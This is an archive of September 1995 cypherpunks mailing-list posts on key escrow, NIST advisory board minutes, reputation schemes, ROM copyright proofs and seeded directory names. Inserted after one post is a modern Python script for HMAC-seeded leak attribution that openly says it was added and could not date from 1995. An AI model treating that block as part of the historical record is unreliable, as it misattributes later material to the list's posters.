I seem to recall a lawsuit where somebody like Tandy was suing somebody else, claiming they copied the computer's ROM code. As proof they pulled out the competitor's computer, pressed a certain key combination, and the Tandy copyright flashed up on the screen. As I also recall, they LOST the suit believe it or not... Anybody heard of this? Circa 1988-1991 I believe. Sure shows what a slick lawyer can get you out of...

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFO+acLa+QKZS485AQFNCQL+L/HtUtC//QAi8II8Ktf7bZjSt3YRdmBf
/zNieoiM5buZDAlC/GHR4bw4RJl5qWbY33r8QB4akR4b108Fvf0BxkUCgPmdI95f
f+MHqxcRLfwgcoj0XiwxMrR9pQyJEv4B
=8myc
-----END PGP SIGNATURE-----

fRee cRyPTo! jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39)
June 7&14, 1995: 1st amendment repealed.
Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

From nobody at REPLAY.COM Sun Sep 10 21:50:18 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 10 Sep 95 21:50:18 PDT
Subject: GAK Advisory Board
Message-ID: <199509110450.GAA02109@utopia.hacktic.nl>

From URL: http://csrc.ncsl.nist.gov/csspab/minutes.395

Minutes of the March 22-23, 1995 Meeting of the Computer System Security and Privacy Advisory Board

Wednesday, March 22, 1995

Introduction

A quorum being present, the Chairman, Dr. Willis Ware, called the meeting to order at 9:00 a.m. at the Holiday Inn, Gaithersburg, Maryland. Besides Dr. Ware, the following Board members were present: Charlie Baggett Jr., Genevieve Burns, Cris Castro, Don Gangemi, Sandra Lambert, Henry Philcox, Randy Sanovic, Stephen Trodden, Steve Walker [TIS], and Bill Whitehurst [IBM].

[Snip long section on security assurance standards and methods in US, Canada and UK.]

Update on X/Open Branding Project

Mr. Bill Whitehurst, IBM, gave a brief update of the activities of the X/Open Branding Project. Two major components exist within their branding concept: (1) the ability to implement functionality based on a minimum set of assurance functionality requirements (MSFR), and (2) the confidence in the development process for achieving the functionality. He said that the workgroup meeting, hosted by Hewlett Packard, was held early in March. The group plans to re-write their document to include some type of evaluation process prior to the vendor product getting branded. X/Open plans to have a public review of the changes this summer.

Vendor Perspective

Ms. Linda Vetter, Oracle Corporation, presented Oracle's views of security assurance. She discussed three types of assurance issues: (1) government evaluation and certification; (2) third party evaluation and certification (government and business sponsored); and (3) vendor claims. Ms.
Vetter explained Oracle's evaluation experience for two DBMS server products, Oracle7 and Trusted Oracle7, in both the US and the UK. Oracle used the US TCSEC TPEP evaluation for B1 and C2 systems. They also used the UK ITSEC evaluation for E3 systems (which is the equivalent for US B1 and C2 systems). The UK process took significantly less time and cost less money for an identical product. Ms. Vetter suggested that NIST/NSA look into developing equivalent/comparable trust levels between the two different evaluation criteria methods as well as those for other countries. This would minimize the need to have different evaluations performed (one for each country) for the same product. Oracle has on-going work in other areas (e.g., RAMP, CMM, ISO, and Audits) as well as multiple CLEFS with the UK, Sweden, France and Germany.

Ms. Vetter explained the differences in criteria between the TCSEC and the ITSEC. She said that the ITSEC requirements for the content of evaluation deliverables formed a superset of the corresponding TCSEC requirements for the evaluations. However, the TCSEC creates a framework for the presentation of these requirements and there can be little deviation from this. Oracle would like to see more concentration on low-end assurance requirements and processes. This would enable various sectors like health care, banking, and financial industries to have protection for unclassified to sensitive data. Ms. Vetter encouraged NSA to continue its efforts in modeling (Common Assurance Framework, TCMM, and SE CMM) and would discourage any more efforts in product profiling. The modeling efforts encourage vendor quality improvement, promote flexibility in meeting assurance objectives, and are transferable to other private sector domains besides DoD. (See Reference #8).

Wrap-up and Restatement of Issues

Dr. Katzke summarized the discussion of assurance by saying that opportunities exist to look at alternatives.
He is not sure what the government's role is or which areas to concentrate on with respect to cost. He said that he could continue with the same level of effort that is going on now with community involvement. He is open to suggestions with regard to the assurance process. Discussion After a lengthy discussion on the state of the Common Criteria (CC) and assurance approaches and issues, some of the major points from individual Board members included: - Concern as to when the CC will be widely accepted and used; - Whether to adopt the ITSEC now and migrate to CC; - The need to simplify the CC; - Building assurance and quality into the new assurance framework; - Clearly define assurance needs to be universally understood; - Conduct more C2 and below evaluations in the US; - Concentrate on low-end assurance; and - Bring key industry players into the process. [Snip] Board members continued their discussion of criteria and assurance from the previous day. Some of the major points of the discussion from Board members included the need: - for OMB to state the need for C2 level evaluation compliance for various government product purchases; - for NSA to make a statement about equivalency among all existing non-US trust levels; - to begin using components of the Common Criteria and gradually migrate to it; - to continue a wide range of assurance framework options and procedures; and - to focus on low-end assurance methods and encourage C2 level evaluation along the following Canadian AL-1 evaluation. [Snip] Status of Key Escrow Initiative Mr. Steve Walker, Trusted Information Systems (TIS), briefed the Board on the status of Commercial Key Escrow (CKE). He said, with regard to application vendors, TIS is actively seeking the participation of commercial software vendors in widespread implementation of CKE enabled software products. 
TIS has installed a Data Recovery Center (DRC) on the Internet and is prepared to distribute sample DRC application software packages to any interested software application developer. TIS is seeking approval of the US government for export of application programs using encryption algorithms such as the Data Encryption Standard (DES) when properly bound with CKE. Mr. Walker said the advantages of CKE for government interests are that if the TIS CKE system were to become widely used throughout the private sector and government communities, law enforcement, national security and private sector interests would be preserved. Mr. Walker said that TIS has filed for patent protection for its Software Key Escrow (Clipper equivalent) and CKE systems including the DRC and application software approaches. TIS is prepared to license its CKE system and software applications technology to any software or hardware vendor under very favorable licensing terms. TIS is also prepared to license its DRC system and technology to qualified DRC operators and vendors under similarly favorable licensing terms. (See Reference #13).

[Snip]

----------

From URL: http://csrc.ncsl.nist.gov/csspab/csspab.txt

National Computer System Security and Privacy Advisory Board
Identifying Emerging Computer Security Issues

What is the Computer System Security and Privacy Advisory Board (CSSPAB)?

Congress established the CSSPAB as a public advisory board in the Computer Security Act of 1987. The Board is composed of twelve members, in addition to the Chairperson, who are recognized experts in the fields of computer and telecommunications systems security and technology.

What is the Board's purpose?

The Computer Security Act specifies that the Board's mission is to identify emerging managerial, technical, administrative, and physical safeguard issues relative to computer systems security and privacy.

What is the scope of the Board's authority?
The Board examines those issues affecting the security and privacy of sensitive unclassified information in federal computer and telecommunications systems. The Board's authority does not extend to private-sector systems or federal systems which process classified information.

What are the board's advisory and reporting functions?

The Board advises the Secretary of Commerce and the Director of the National Institute of Standards and Technology (NIST) on computer security and privacy issues pertaining to sensitive unclassified information stored or processed by federal computer systems. The Board reports its findings to the Secretary of Commerce, the Director of the Office of Management and Budget, the Director of the National Security Agency, and appropriate committees of Congress.

How often and where does the Board meet?

The Board holds its two-day meetings twice per year; however, additional meetings may be called at the Chairperson's discretion. Board meetings are held in the Washington, DC metropolitan area as well as other areas in which there is significant federal computer security interest and activity.

Are Board meetings open to the public?

In accordance with the Federal Advisory Committee and Government in Sunshine acts, Board meetings are announced in the Federal Register and are normally open to the public. The Board accepts written statements from the public (see address on reverse).

How is CSSPAB membership determined?

The Director of NIST of the Department of Commerce appoints Board members for four-year terms. By law, the membership of the Board is distributed as follows:
- Four experts from outside of federal government, one of whom is representative of a small- or medium-size firm;
- Four non-government employees who are not employed by or a representative of a producer of computer or telecommunications equipment; and
- Four members from the federal government, including one from the National Security Agency of the Department of Defense.
Nominations to fill vacancies on the Board may be submitted to the Director of NIST. NIST personnel serve as the Board's Secretariat. Other federal agency personnel may also assist the Board's activities as specified in the Computer Security Act of 1987.

Are Board members paid for their service?

Board members do not receive a salary or stipend; however, authorized travel expenses are reimbursed as specified by Congress.

*******************************************************

For further information, please contact:
Computer System Security and Privacy Advisory Board
Executive Secretariat
National Computer Systems Laboratory
Technology Building, Room B-154
National Institute of Standards and Technology
Gaithersburg, MD 20899

From greg at ideath.goldenbear.com Sun Sep 10 22:05:43 1995
From: greg at ideath.goldenbear.com (Greg Broiles)
Date: Sun, 10 Sep 95 22:05:43 PDT
Subject: question about reputation
Message-ID: <199509110502.AA29554@ideath.goldenbear.com>

-----BEGIN PGP SIGNED MESSAGE-----

Wei Dai writes:
> For example, Alice starts an anonymous consulting service, and announces that she will answer the first ten queries for free. Upon hearing this, Mallet immediately starts another consulting service, and announces the same offer. At this point Mallet can simply forward his customers' queries to Alice and Alice's answers back to his customers. Thus, he gains reputation at no cost.

Well, long term he won't be able to keep it - what will he do when Alice starts charging for her services? He can charge more than she does, and they'll have equivalent "accuracy ratings" but Alice will provide her services more cheaply - or he can stop asking Alice and make up his own answers (or not answer) and his reputation will drop quickly. While I admit that I'd be pissed off if I were Alice, Mallet isn't really harming her - she gets business at the rate she's established.
If Mallet's customers and Alice's don't overlap (maybe Mallet speaks/writes in a different language, or has different friends) then it's arguable that Mallet is doing Alice a favor. If Mallet continues to purchase answers from Alice (even if he charges his customers more) his reputation isn't really false, if you think of it as meaning "can provide good answers to questions" versus "can figure out good answers to questions by himself".

More proactively, Alice might choose to publish the questions and answers publicly (the customers are, after all, anonymous, and only revealing as much about themselves as they'd reveal to an unknown party - Alice could sanitize the questions of identifying facts even further, if appropriate) - this would prove her aptitude (or lack thereof) to a wider audience, and Mallet's customers could notice that she was providing answers to their questions (how did she know of their questions?) before Mallet does.

Alice could also choose to answer questions for free, but only to named and well-known parties with good reputations. This is a standard trick for new consultants/businesses - work cheap or free for a person or business that comes in contact with many people or gets lots of publicity. Cochran, Shapiro, et al could make a fortune from the Simpson trial even if they didn't charge OJ a dime - people charged with serious crimes will be calling them for years to come because of their media exposure. If Alice is paranoid, the well-known party could post a bond with an escrow agent, to be returned when they posted a public evaluation of Alice's services.

> On the other hand, this "man-in-the-middle" attack can also work against conventional True Name based services, but perhaps with less effect. Has anyone ever heard of this being done?

This "man-in-the-middle attack" is called, variously, arbitrage or capitalism. :) You've rediscovered Marx' surplus value theory of labor.
(shh, don't say any more, or someone will say we're using language wrong.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFPCmH3YhjZY3fMNAQEzTAP/dJFeg828BVuqS06deN15ILrX/13q2iSa
seMCWXJMxOmRPS+oS7vbJtJ8jIhEJVlg+p9Un/rstD4QM7q6PRgKw9daq5LMav3y
S+i0sYKEBnMmF+q5Ocm6EshHCAYs9sQOkM7hxr0rq0vhX3onFlpAIVBmUhz4BjtX
YtoSpLWQ62U=
=i8Zt
-----END PGP SIGNATURE-----

From tcmay at got.net Sun Sep 10 22:57:31 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 10 Sep 95 22:57:31 PDT
Subject: GAK Advisory Board
Message-ID:

Thanks to "Anonymous" for sending this to us. I visited the site, http://csrc.ncsl.nist.gov/csspab, and there seem to be some interesting things there.

At 4:50 AM 9/11/95, Anonymous wrote:
>Status of Key Escrow Initiative
>
>Mr. Steve Walker, Trusted Information Systems (TIS), briefed the Board on the status of Commercial Key Escrow (CKE). He said, with regard to application vendors, TIS ...
>Mr. Walker said the advantages of CKE for government interests is that if the TIS CKE system were to become widely used throughout the private sector and government communities, law enforcement, national security and private sector interests would be preserved.

If Data Recovery Centers are indeed completely choosable by the users, as certain statements by TIS folks have asserted, then how would "law enforcement" and "national security" interests be "preserved"?

(I can tell you that BlackNet won't be using any government-approved DRCs. Nor will Kizer Sose be using any registered and licensed DRCs. If people are free to pick DRCs--the only option a free society can support--the results are obvious.)

Note also the emphasis on "throughout the private sector and government communities" as leading to this protection of law enforcement and national security interests...no mention of this being mainly for export issues...the focus seems to be on domestic use of CKE, with the "law enforcement" and "national security" needs "preserved." Sounds ominous to me.
I've used "Tim's Really Flaky Commercial Key Escrow Service" as a placeholder for the kind of truly voluntary DRCs many of us would insist on. (Other examples: a computer on my LAN, the bit bucket, my neighbor, my lawyer, my bank in Lichtenstein, etc. Some of these are actually what I would want to use. I can imagine interesting situations wherein attorney-client privilege blocks access to the keys.)

So, what's the story? Is Steve Walker of TIS supporting the kind of completely voluntary CKE system that Carl Ellison has advocated? Or a mandatory system? (A third imaginable possibility is "a system which is so universally popular that it becomes universally used"...unlikely in the extreme, as I know of at least a few people who won't use it, and expect others to bypass it when they learn what the Feds can do. But I expect that the advocates of the mandatory option will cite this possibility, as a way of sugar-coating the proposal. Then, if this option fails (to preserve the Government's interests!), watch for registration of DRCs.)

I met Steve Walker once, at the CFP Conference, and he seemed genuinely interested in selling to citizens a voluntary system. But his comments to the Privacy Advisory Board seem to imply a CKE system that would not be completely voluntary in the operation (licensing, registering, auditing) of Data Recovery Centers. If this is the case, then alternatives to the TIS system will likely gain more adherents from folks like us.

>Mr. Walker said that TIS has filed for patent protection for its Software Key Escrow (Clipper equivalent) and CKE systems including the DRC and application software approaches. TIS is prepared to license its CKE system and software applications technology to any software or hardware vendor under very favorable licensing terms. TIS is also prepared to license its DRC system and technology to qualified DRC operators and vendors under similarly favorable licensing terms. (See Reference #13).
The TIS system may be patented, but it seems to me that the older ideas of Shamir secret sharing are not. And even simpler schemes of sealing parts of keys in several envelopes...

(My point is that older ideas of using crypto in conjunction with emergency recovery systems are still usable, and have been talked about for many years, long before the TIS disclosures.)

I hope it doesn't come to this. I hope TIS releases or licenses on very general terms, with no government control of the DRCs. If not, I predict their system will be subject to derision, and worse.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From nobody at REPLAY.COM Sun Sep 10 23:00:20 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 10 Sep 95 23:00:20 PDT
Subject: GAK Advisory Board 94
Message-ID: <199509110600.IAA03045@utopia.hacktic.nl>

From URL: http://csrc.ncsl.nist.gov/csspab/94-rpt.txt

Executive Summary

This Annual Report documents activities of the National Computer System Security and Privacy Advisory Board during 1994, its sixth year. During the year, the Board continued to review cryptography related issues. During 1994, the Escrowed Encryption Standard (EES) and the Digital Signature Standard (DSS) were approved as Federal Information Processing Standards (FIPS 185) and (FIPS 186) respectively. The Board heard briefings on escrowing release procedures, escrow program procedures, U.S. export procedures, international cryptography proposals, international corporate key escrow, alternative key escrow approaches, and software-based key escrow encryption.
The Board also continued to follow activities related to the Common Criteria (CC), which remains in draft form. [Comments on the CC will be reviewed and processed in March 1995.] The Board continued to examine the question as to whether there is a business case for setting up a Trusted Technology Assessment Program (TTAP).

Membership

Currently, Dr. Willis H. Ware, a senior researcher of the Corporate Research Staff of RAND, serves as Chairman of the Board. He was appointed in July 1989. As of December 1994, the membership of the Board is as follows:

- Chairman
  Willis H. Ware, RAND
- Federal Members
  Charlie C. Baggett, Jr., National Security Agency
  Henry H. Philcox, Department of the Treasury, Internal Revenue Service
  Cynthia C. Rand, Department of Transportation
  Stephen A. Trodden, Department of Veterans Affairs
- Non-Federal, Non-Vendor
  Genevieve M. Burns, Monsanto Corporation (Member Designate)
  Cris R. Castro, KPMG Peat Marwick
  Sandra Lambert, Citibank
  Randolph Sanovic, Mobil Corporation (Member Designate)
- Non-Federal, Vendor
  Gaetano Gangemi, Wang Laboratories, Inc.
  Linda Vetter, Oracle Corporation (Member Designate)
  Stephen T. Walker, Trusted Information Systems, Inc.
  Bill Whitehurst, International Business Machines Corp.

In December of 1994, Ms. Cynthia Rand resigned from the Board, leaving a vacancy in the federal member category.

II. Major Issues Discussed

The work of the Board during 1994 was devoted to various topics related to security of federal unclassified automated information systems. Among the most important were:
- Cryptographic Key Escrowing Procedures
- Alternative Key Escrow
- Security in the National Information Infrastructure (NII)

Escrowing Release/Program Procedures

The Department of Justice briefed the Board on procedures for release of cryptographic key components, by the two escrow agents, to government agencies.
The two escrow agents are the National Institute of Standards and Technology (NIST), of the Department of Commerce, and the Automated Systems Division of the Department of Treasury. The agents act under strict procedures to ensure the security of the key components and which govern their release for use in conjunction with lawful wiretaps.

NIST discussed the procedures for the key escrow program. Five federal agencies share a role in the key escrow program:
(1) the Department of Justice is a sponsor and a family key agent that holds one of the components of the family key,
(2) the Federal Bureau of Investigation is the initial law enforcement user and a family key agent that holds the other component of the family key,
(3) NIST has a dual role as the program manager and a key escrow agent,
(4) the Department of Treasury is a key escrow agent; and
(5) the National Security Agency is the system developer that provides technical assistance.

Alternative Key Escrow

Bankers Trust presented some rationales for key escrow encryption for corporations, which fulfills management supervision and compliance duties, and reduces business risks. They maintain that the Bankers Trust system can meet both U.S. and European needs. Their system has been discussed with Canada, Britain, France, Singapore, and the U.S.; however, none of these countries have endorsed the system.

Trusted Information Systems, Inc. gave a demonstration and overview of their approach to software-based key escrow encryption. They said that software key escrow systems could be built that meet the objectives of law enforcement. Also, that variations of their software key escrow system can provide a commercial key escrow capability that will be very appealing to corporate and individual computer users.
They believe that widespread use of corporate key escrow, in which corporations operate their own key escrow centers, and individual key escrow, in which bonded commercial key escrow centers provide a key retrieval capability for registered users, will better achieve the key escrow objectives of law enforcement than a government-operated key escrow system.

[Snip 180kb of very informative docs on the main US cryptography issues of 1994, still alive in '95.]

From hal9001 at panix.com Sun Sep 10 23:30:38 1995
From: hal9001 at panix.com (Robert A. Rosenberg)
Date: Sun, 10 Sep 95 23:30:38 PDT
Subject: Internet commerce mtg, Denver
Message-ID:

At 13:00 9/9/95, Vladimir Z. Nuri wrote:
>the rep told me something interesting: he said that every Bell phone book is actually "seeded" with dummy names so they can detect copyright infringers. if you come out with a business directory, these Bells will just scan for the fake names that they have inserted into their own listings. if they find them, supposedly they can show them to a copyright judge and he will immediately close down your operation and fine you, almost no questions asked. I didn't know how much of this really happens (the legal stuff sounded questionable to me) but it is an interesting "real world" instance of copyright terrorism prevention that the "information liberation front" would have to contend with.

This is standard practice with (snailmail) mailing lists. When you buy a one-time-use mailing list, there are always names in there to detect resale or reuse of the list. There are people whose job it is to scan the junk mail they get and report when they get mail to specifically encoded names (which would indicate that the mailing list has been reused or merged with another list without permission). I see nothing wrong with doing something similar with Phone Books (and I seem to remember reading that has been done in the past).
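The seeded-names scheme Rosenberg describes, as an added Python example (not code from any poster on this list): the list owner derives a few seed entries for each licensee with an HMAC over a secret, so the seeds look like ordinary entries and cannot be filtered out without the secret, and when unexpected mail later arrives at the seed mailboxes the owner checks whose seeds were hit. The master list, the secret, the licensee ids and the `example.net` seed domain are all constructed assumptions for the demo.

```python
import hmac
import hashlib

# Constructed sample master list (no real people); an assumption for the demo.
MASTER_LIST = ["alice@example.org", "bob@example.org", "carol@example.org"]

# Seed mailboxes are assumed to live at a domain the list owner controls,
# so anything mailed to them comes back to the owner. Assumed name.
SEED_DOMAIN = "example.net"


def seed_address(secret: bytes, licensee_id: str, index: int) -> str:
    """Derive the index-th seed entry for one licensee.

    HMAC over (licensee_id, index) gives an address the owner can reproduce
    at will but which, without the secret, is indistinguishable from a real
    entry, so a copier cannot simply strip the canaries out.
    """
    tag = hmac.new(secret, f"{licensee_id}:{index}".encode(), hashlib.sha256)
    return f"r{tag.hexdigest()[:12]}@{SEED_DOMAIN}"


def seed_list(master: list[str], secret: bytes, licensee_id: str,
              n_seeds: int = 3) -> list[str]:
    """Return the copy handed to one licensee: the master entries plus that
    licensee's seeds, sorted so the seeds do not cluster at the end."""
    seeds = [seed_address(secret, licensee_id, i) for i in range(n_seeds)]
    return sorted(master + seeds)


def identify_leak(observed: list[str], secret: bytes, licensee_ids: list[str],
                  n_seeds: int = 3, min_hits: int = 2) -> dict[str, list[str]]:
    """Map each licensee whose seeds received mail to the seeds that were hit.

    `observed` holds the recipient addresses seen on unexpected mail at the
    seed mailboxes. Requiring min_hits distinct seeds before naming a
    licensee avoids attributing a copy on the strength of a single address
    that could have reached a third party some other way.
    """
    seen = set(observed)
    hits: dict[str, list[str]] = {}
    for lid in licensee_ids:
        seeds = {seed_address(secret, lid, i) for i in range(n_seeds)}
        matched = sorted(seeds & seen)
        if len(matched) >= min_hits:
            hits[lid] = matched
    return hits


def demo() -> dict[str, list[str]]:
    """Constructed scenario: licensee-A's copy is reused by a third party who
    mails everyone on it; licensee-B's copy stays private."""
    secret = b"constructed-demo-secret"  # assumption, not a real key
    copy_a = seed_list(MASTER_LIST, secret, "licensee-A")
    # Unexpected mail arrives for every address on A's copy, plus noise.
    received = copy_a + ["noise@example.com"]
    return identify_leak(received, secret, ["licensee-A", "licensee-B"])


if __name__ == "__main__":
    print(demo())  # names licensee-A together with its three seed addresses
```

Attribution is only as strong as the secret and the seed mailboxes: if the secret leaks, a copier can regenerate and remove the seeds, and if a seed address is ever used for anything but this purpose the hit count loses its meaning, which is why the threshold rather than a single match decides.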
From rmtodd at servalan.servalan.com Mon Sep 11 00:28:30 1995
From: rmtodd at servalan.servalan.com (Richard Todd)
Date: Mon, 11 Sep 95 00:28:30 PDT
Subject: Document Fingerprinting
In-Reply-To: <199509110443.WAA00476@wero.byu.edu>
Message-ID:

In servalan.mailinglist.cypherpunks you write:
>I seem to recall a lawsuit where somebody like Tandy was suing somebody else, claiming they copied the computer's rom code. As proof they pulled out the competitors computer, pressed a certain key combination, and the Tandy copyright flashed up on the screen. As I also recall, they LOST the suit believe it or not...

Dunno about that one, but there was one where Tandy/Radio Shack was being sued by the guy (Randy Cook) who originally wrote TRSDOS 2.1, claiming RS owed him royalties (which they weren't paying) because the current shipping TRSDOS for the Mod I at the time (v2.3) still had Randy's code. RS claimed otherwise. Randy Cook showed that if you held down two keys while booting TRSDOS 2.3, (either the '2' and '4' keys, or '2' and '6', I forget which), instead of going into the OS the machine would show a nice copyright screen, including "Copyright (C) Randy Cook". Oops. Tandy/RS had to pay up.

(For those who still have a working Model I and a copy of TRSDOS from that era, the message is located in one of the sectors on Track 0; it's fairly easy to spot with a sector editor like SUPERZAP...)

There was also the famous Apple/Franklin case, where Apple showed that Franklin's Apple II clones contained the original Apple II ROMs, right down to the copyright notice.

From stewarts at ix.netcom.com Mon Sep 11 00:35:31 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Mon, 11 Sep 95 00:35:31 PDT
Subject: Big machine ordered from Intel
Message-ID: <199509110735.AAA01275@ix4.ix.netcom.com>

At 08:40 AM 9/8/95 -0700, Patrick wrote:
>How much you want to bet that a first copy goes to virginia?
>> NY Times, Sept 8, 1995.
>> Intel Wins Contract to Develop World's Fastest Supercomputer
>> San Francisco, Sept. 7 -- The Intel Corporation said today that it had won a contract from the Department of Energy to develop what it called the world's fastest supercomputer. ...
>> The machine, to be built at an estimated cost of $45 million, would use 9,000 of Intel's forthcoming P6 microprocessors linked in a configuration known as

Not likely. It's the kind of machine Sandia _would_ use, especially since they seem to be getting good support for nuclear-related boondoggles even after the demise of the Cold War, and it's also the kind of thing they could use for commercial applications if they lose their nuclear funding, or use to say "But we _need_ to keep funding this program, we haven't yet gotten our money's worth out of this big expensive computer", etc.

Also, the cost is roughly $5K/processor, which is probably more than you'd need to build a MPP key-cracker, which doesn't need as much interaction between processors.

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From karlmarx at ix.netcom.com Mon Sep 11 00:43:04 1995
From: karlmarx at ix.netcom.com (Ethan Lindsey)
Date: Mon, 11 Sep 95 00:43:04 PDT
Subject: Voice Encryption
Message-ID: <199509110742.AAA17689@ix5.ix.netcom.com>

A friend of mine recently told me that Phil Zimmerman was distributing a voice encryption program over the 'net. I dismissed his comment thinking he was probably just confused and thinking about PGP. Lately though, I've been wondering if he was right. Does anyone know of any voice cryptology program that encrypts voice through a modem connection? Thanx...
ethan

From damion.furi at the-matrix.com Mon Sep 11 02:11:24 1995
From: damion.furi at the-matrix.com (DAMION FURI)
Date: Mon, 11 Sep 95 02:11:24 PDT
Subject: question about reputa
In-Reply-To: <8B0D52F.000504EADD.uuout@the-matrix.com>
Message-ID: <8B0E027.000504EC28.uuout@the-matrix.com>

F|Adam Shostack writes:
|# Good question, but a quick modification allows for effective bootstrapping. If I want to start consulting for Amalgameted Consolodated, I can offer them a 10 free questions deal to bootstrap things with. Mallet can only cheat if my offer was broadcast.
F|Wei Dai writes:
|> This scheme doesn't quite work. (Let's call Amalgameted Bob, to keep names short.) Bob can create a new, unlinkable pseudonym and give the same offer to Carol under the new pseudonym. Then, Bob acts as Mallet and passes messages back and forth between Alice and Carol.
F|If all Alice's prospective customers are also resellers on the side, then I agree that she has a problem. But how realistic is a market scenario in which a new supplier cannot positively identify some legitimate end consumers of a product or service ? (I'm ignoring cases in which the market for the product or service is only just being forged.) This strikes me as rather implausible, although I don't claim to have devoted a great deal of thought to it.

Hey, Wei, you overlooked something rather simple: suppose Alice wasn't any good? Or suppose she was good, in general, but came up wrong at a bad time? Whereas she might have corrected it in time if it had been her client and she had direct access, Mallet gets hit broadside out of ignorance-- and the resulting delay from the extra link in the chain could easily be enough to ruin him.

:----------:----------:----------:----------:----------:----------:-----
: furi at the-matrix.com | pgp-public-key at demon.co.uk | LIVE LION ALERT
: 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0 F7 E9 67 1F AF B8 2D 94
PGP: When it's none of their damned business.
--- SPEED 2.00 #2640

From frissell at panix.com Mon Sep 11 02:48:08 1995
From: frissell at panix.com (Duncan Frissell)
Date: Mon, 11 Sep 95 02:48:08 PDT
Subject: Digital Fingerprinting
In-Reply-To:
Message-ID:

On Sun, 10 Sep 1995, Timothy C. May wrote:
> If a piece of mail addressed to me is found littering the highway, can I be convicted of littering? No, because the _provenance_ of that item of mail cannot be determined...it might have accidentally blown out of a trash truck delivering my mail to the dump, for example.

I'm afraid that they are busting people in New York for recycling violations when they find mail addressed to them mixed in with household garbage in public trash cans.

DCF

From baum at world.std.com Mon Sep 11 03:44:17 1995
From: baum at world.std.com (Michael S Baum)
Date: Mon, 11 Sep 95 03:44:17 PDT
Subject: FYI
Message-ID:

From habs at warwick.com Mon Sep 11 04:03:33 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Mon, 11 Sep 95 04:03:33 PDT
Subject: Internet commerce mtg, Denver
In-Reply-To:
Message-ID: <199509111101.HAA12452@cmyk.warwick.com>

> I see nothing wrong with doing something similar with Phone Books (and I seem to remember reading that has been done in the past).

More than that it is completely legal (to type in such a book). Now back to cypherpunk topics

/hawk
--
Harry Hawk
Manager of Computer Services
Warwick Baker & Fiore
212 941 4438
habs at warwick.com

From bart at netcom.com Mon Sep 11 05:50:46 1995
From: bart at netcom.com (Harry Bartholomew)
Date: Mon, 11 Sep 95 05:50:46 PDT
Subject: Information Security and Privacy in Network Environments (fwd)
Message-ID: <199509111247.FAA00620@netcom16.netcom.com>

This was posted to another list today. It purports to be fresh although the file at the Web site is dated 11 August. Hope this is not redundant.

> *
> U.S.
CONGRESS
> OFFICE OF TECHNOLOGY ASSESSMENT
> Washington, DC 20510
> *
>
> *
> ISSUE UPDATE ON INFORMATION SECURITY AND PRIVACY IN NETWORK ENVIRONMENTS
> *
>
> The OTA background paper "Issue Update on Information Security and Privacy in Network Environments" is now available. Ordering information and details about electronic access are at the end of this file.
>
> INFORMATION SECURITY AND PRIVACY ISSUES IN NETWORK ENVIRONMENTS REQUIRE CONGRESSIONAL ATTENTION
>
> Transition to a society that depends on electronic information and network connectivity brings new concerns for information security and effective protection of privacy. The new focus must be on safeguarding information as it is processed, stored, and transmitted, rather than on "document" security or "computer" security. In the networked society, responsibility for information security is shifting to the end users.
>
> In a background paper released today the congressional Office of Technology Assessment (OTA) finds an increasingly urgent need for timely congressional attention to these concerns.
>
> OTA has updated, at the request of the Senate Committee on Governmental Affairs, some key issues identified in its 1994 report on information security and privacy. OTA found that recent and ongoing events are relevant to congressional consideration of national cryptography policy and government-wide guidance on safeguarding unclassified information in federal agencies.
>
> OTA stresses the need for openness, oversight, and public accountability--given the broad public and business impacts of these policies--throughout the discussion of possible congressional actions. In OTA's view, two key questions underlie consideration of policy options.
> The first is: How will the nation develop and maintain the balance among traditional "national security" and law-enforcement objectives and other aspects of the public interest, such as economic vitality, civil liberties, and open government? The second is: What are the costs of government efforts to control cryptography and who will bear them?
>
> None of the cost estimates will be easy to make, warns OTA. Ultimately, however, these costs are all borne by the public, whether in the form of taxes, product prices, or foregone economic opportunities and earnings.
>
> OTA emphasizes that congressional oversight of government information security and privacy protection is of utmost importance in the present time of government reform and organizational streamlining. The security of unclassified information has not been a top management priority; downsizing can incur additional information security and privacy risks. Similarly, says OTA, management must ensure integration of safeguards when streamlining agency operations and modernizing information systems.
>
> OTA finds momentum building for government-wide consolidation of information-security responsibilities. Congress must resolve the overarching issue of where federal authority for safeguarding unclassified information in the civilian agencies should reside and, therefore, what needs to be done concerning the substance and implementation of the Computer Security Act of 1987, says OTA. If Congress retains the general premise of the act--that responsibility for unclassified information security in the civilian agencies should not reside within the defense/intelligence community--then vigilant oversight and clear direction will be needed, says OTA.
>
> Timely and continuing congressional oversight of cryptography policies is crucial, says OTA.
> Cryptography, a fundamental safeguard, can preserve the confidentiality of messages and files, or provide "digital signatures" that will help speed the way to electronic commerce. Non-governmental markets for cryptography-based safeguards have grown over the past two decades, but are still developing. Research is international; markets would be, says OTA, except for governmental restrictions, such as export controls that effectively create "domestic" and "export" market segments for strong encryption products.
>
> Cryptography policies affect technological developments in the field, as well as the health and economic vitality of companies that produce or use products incorporating cryptography, and consequently, the vitality of the information technology industries and the everyday lives of most Americans. But, business has strong and serious concerns that government interests, especially with respect to standards and export controls, could stifle commercial development and use of networks in the international arena. Given the broad public and business impacts, timely and continuing congressional oversight of these policies is crucial.
>
> Strong encryption is increasingly portrayed as a threat to domestic security (public safety) and a barrier to law enforcement if it is readily available for use by terrorists or criminals. Thus, export controls, intended to restrict the international availability of U.S. cryptography technology and products, are now being joined with domestic cryptography initiatives, like key-escrow encryption, that are intended to preserve U.S. law-enforcement and signals-intelligence capabilities.
>
> Public and business concerns surrounding the Clinton Administration's escrowed-encryption initiative have not been resolved, notes OTA.
